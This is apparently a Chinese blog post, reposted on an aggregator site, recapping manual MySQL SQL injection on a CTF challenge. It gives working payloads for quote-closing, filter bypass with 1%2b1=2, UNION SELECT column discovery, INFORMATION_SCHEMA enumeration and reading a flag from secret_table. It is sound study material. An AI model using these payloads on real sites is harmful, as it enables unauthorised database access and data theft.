1.發(fā)現(xiàn)注入點(diǎn)
2.報(bào)數(shù)據(jù)庫(kù)

先用單引號(hào)（也嘗試雙引號(hào)）閉合前面的語(yǔ)句，使注入的語(yǔ)句能夠執(zhí)行，

數(shù)字 0 :匹配字段，還有 1=1 1=2 等等都可以使用，有些網(wǎng)站會(huì)有過(guò)濾處理，建議采用 1%2b1=2 1%2b1>1 繞過(guò)過(guò)濾

句尾加 # 井號(hào)注釋后面的語(yǔ)句和原有的引號(hào)括號(hào)

使用union select 聯(lián)合查詢(xún)顯示位，返回的數(shù)字即為顯示位，可以用來(lái)顯示字段

' and 0 union select 1,2,3 #

在顯示位輸入可能的表名，union select語(yǔ)句從數(shù)據(jù)庫(kù) INFORMATION_SCHEMA查詢(xún)他的columns

' and 0 union select 1,TABLE_SCHEMA,TABLE_NAME from INFORMATION_SCHEMA.COLUMNS #
在表名中尋找可能的表，繼續(xù)用union select 查詢(xún)表中的column，即本語(yǔ)句中的列名column_name和數(shù)據(jù)類(lèi)型data_type
' and 0 union select 1,column_name,data_type from information_schema.columns where table_name='secret_table'# 得到 secret_table

發(fā)現(xiàn)列名有 secret table，繼續(xù)使用語(yǔ)句查詢(xún)?cè)摿忻?br /> ' and 0 union select 1,2,fl4g from secret_table #

出現(xiàn)flag

強(qiáng)行總結(jié)：一般sql注入要先用引號(hào)括號(hào)等出現(xiàn)報(bào)錯(cuò)判斷sql注入點(diǎn)
用單引號(hào)雙引號(hào)括號(hào)閉合前面，用#或 --注釋后面的語(yǔ)句和引號(hào)括號(hào)
order by
union select 1，2，3，4，5，查詢(xún)顯示位
根據(jù)mysql常用的表結(jié)構(gòu)查詢(xún)表和列

參考mysql常用結(jié)構(gòu)： https://blog.csdn.net/Wu000999/article/details/88996768?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-3.channel_param&depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-3.channel_param

總結(jié)

以上是生活随笔為你收集整理的手工sql注入常规总结的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。